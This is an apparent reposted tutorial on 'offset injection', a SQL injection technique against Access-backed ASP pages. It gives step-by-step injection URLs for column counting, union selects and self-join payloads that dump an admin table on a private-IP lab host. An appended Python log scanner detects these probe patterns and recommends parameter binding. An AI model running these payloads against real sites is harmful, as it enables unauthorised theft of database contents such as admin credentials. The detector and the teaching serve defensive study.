Offset injection is mainly used against Access databases where the table name is known but the column names are not.
For example, suppose we already know that the table name is admin.
- Determine the number of columns:
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 order by 22 returns normally
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 order by 23 returns an error
So the column count is 22.
- Find the display positions:
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin

- Determine the number of columns that exist in the table:
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,* from admin returns the same display-position page as in the screenshot above
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,* from admin returns an error
This shows that the admin table has 16 columns.
- The offset formula is as follows:
Subtract the column count found with * from the column count found with order by, then subtract twice that result from the order by column count.
1. 22-16 = 6
2. 22-(6*2) = 10
So the answer is 10.
- The injection formulas are as follows (which data gets dumped is random):
First-level offset injection formula:
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,5,6,7,8,9,10,* from (admin as a inner join admin as b on a.id = b.id)
At this point you can add a.id, or b.id, or both a.id and b.id, to change which content is dumped at random, for example:
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,5,6,7,8,9,10,a.id,b.id,* from (admin as a inner join admin as b on a.id = b.id)
Second-level offset injection formula:
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,* from ((admin as a inner join admin as b on a.id = b.id)inner join admin as c on a.id=c.id)
At this point you can add a.id, or b.id, or both a.id and b.id, to change which content is dumped at random, for example:
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id = b.id)inner join admin as c on a.id=c.id)
Note: here the 10 columns are reduced again by the 6 columns from the table, which is why the second-level offset uses select 1,2,3,4.
Note: viewing the page source works wonders; there may be a pleasant surprise.
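The probe sequence above leaves a distinctive trace in the web server log: `order by N` requests whose response flips from 200 to an error at N+1, a `union select` padded with a long run of integer literals, a bare `*` appended to that list, and a table inner-joined to itself. The following detector is an added example, not code from the original post; it scans constructed log lines (a simplified `client method path query status` format with documentation-range client IPs, both assumptions made here) for those indicators and reconstructs the column count a probing client was able to learn. The root-cause fix is still to bind `id` as a query parameter instead of concatenating it into the SQL string.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log lines (not from the original post). The query strings follow the
# request shapes described in the text; client IPs are placeholders from 192.0.2.0/24 and
# 198.51.100.0/24. Format assumed here: "client method path query status".
SAMPLE_LOG = """\
192.0.2.10 GET /Production/PRODUCT_DETAIL.asp id=1406 200
192.0.2.10 GET /Production/PRODUCT_DETAIL.asp id=1406+order+by+22 200
192.0.2.10 GET /Production/PRODUCT_DETAIL.asp id=1406+order+by+23 500
192.0.2.10 GET /Production/PRODUCT_DETAIL.asp id=1406+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,*+from+admin 200
192.0.2.10 GET /Production/PRODUCT_DETAIL.asp id=1406+union+select+1,2,3,4,5,6,7,8,9,10,*+from+(admin+as+a+inner+join+admin+as+b+on+a.id+%3D+b.id) 200
198.51.100.7 GET /Production/PRODUCT_DETAIL.asp id=1407 200
"""

# "order by <integer>" appended to a numeric id: the column-count probe.
ORDER_BY_PROBE = re.compile(r"\border\s+by\s+(\d+)\b", re.I)
# Leading run of integer literals right after "union select": display-position padding.
UNION_LITERALS = re.compile(r"\bunion\s+(?:all\s+)?select\s+(\d+(?:\s*,\s*\d+)*)", re.I)
# A bare "*" appended to the literal list: the table-width probe and the offset payload.
STAR_IN_UNION = re.compile(r"\bunion\s+(?:all\s+)?select\b[^()]*?,\s*\*", re.I)
# The same table aliased twice and inner-joined to itself: the offset-injection join.
SELF_JOIN = re.compile(r"\b(\w+)\s+as\s+\w+\s+inner\s+join\s+\1\s+as\s+\w+\b", re.I)

# Ordinary application queries do not select long runs of integer literals; treat five or
# more as suspicious (threshold chosen here, tune to the application).
MIN_LITERAL_COLUMNS = 5


def indicators(raw_query: str) -> list[str]:
    """Return the offset-injection indicators present in one URL-encoded query string."""
    q = unquote_plus(raw_query)  # "+" -> space, %3D -> "=" and so on
    found: list[str] = []
    m = ORDER_BY_PROBE.search(q)
    if m:
        found.append(f"order-by-probe:{m.group(1)}")
    m = UNION_LITERALS.search(q)
    if m:
        n = m.group(1).count(",") + 1
        if n >= MIN_LITERAL_COLUMNS:
            found.append(f"union-literal-columns:{n}")
    if STAR_IN_UNION.search(q):
        found.append("union-star-padding")
    m = SELF_JOIN.search(q)
    if m:
        found.append(f"self-join:{m.group(1).lower()}")
    return found


def scan_log(text: str) -> list[dict]:
    """Parse the constructed log format and report every request carrying an indicator."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue  # malformed or unexpected line; skipped rather than guessed at
        client, method, path, query, status = parts
        found = indicators(query)
        if found:
            hits.append({"client": client, "path": path, "status": int(status), "indicators": found})
    return hits


def probe_summary(hits: list[dict]) -> dict[str, int]:
    """Per client, the largest order-by N that returned 200 while N+1 errored.

    That boundary is exactly the column count the probe revealed to the client, which is
    useful when reconstructing what an attacker learned during incident response."""
    ok: dict[str, set[int]] = {}
    bad: dict[str, set[int]] = {}
    for h in hits:
        for ind in h["indicators"]:
            if ind.startswith("order-by-probe:"):
                n = int(ind.split(":", 1)[1])
                bucket = ok if h["status"] == 200 else bad
                bucket.setdefault(h["client"], set()).add(n)
    return {c: max(ns) for c, ns in ok.items() if max(ns) + 1 in bad.get(c, set())}


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["client"], hit["status"], ", ".join(hit["indicators"]))
    print("column count revealed by probing:", probe_summary(SAMPLE_LOG and scan_log(SAMPLE_LOG)))
```

Run against a real log, only the parser in `scan_log` needs to change; the indicator patterns operate on the decoded query string and are independent of the log format. Alerting on the self-join or star-padding indicators alone has a low false-positive rate, since legitimate application requests do not carry SQL fragments in a numeric `id` parameter at all.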

Please credit the source when reposting. Link to this article: https://www.uj5u.com/qita/30934.html
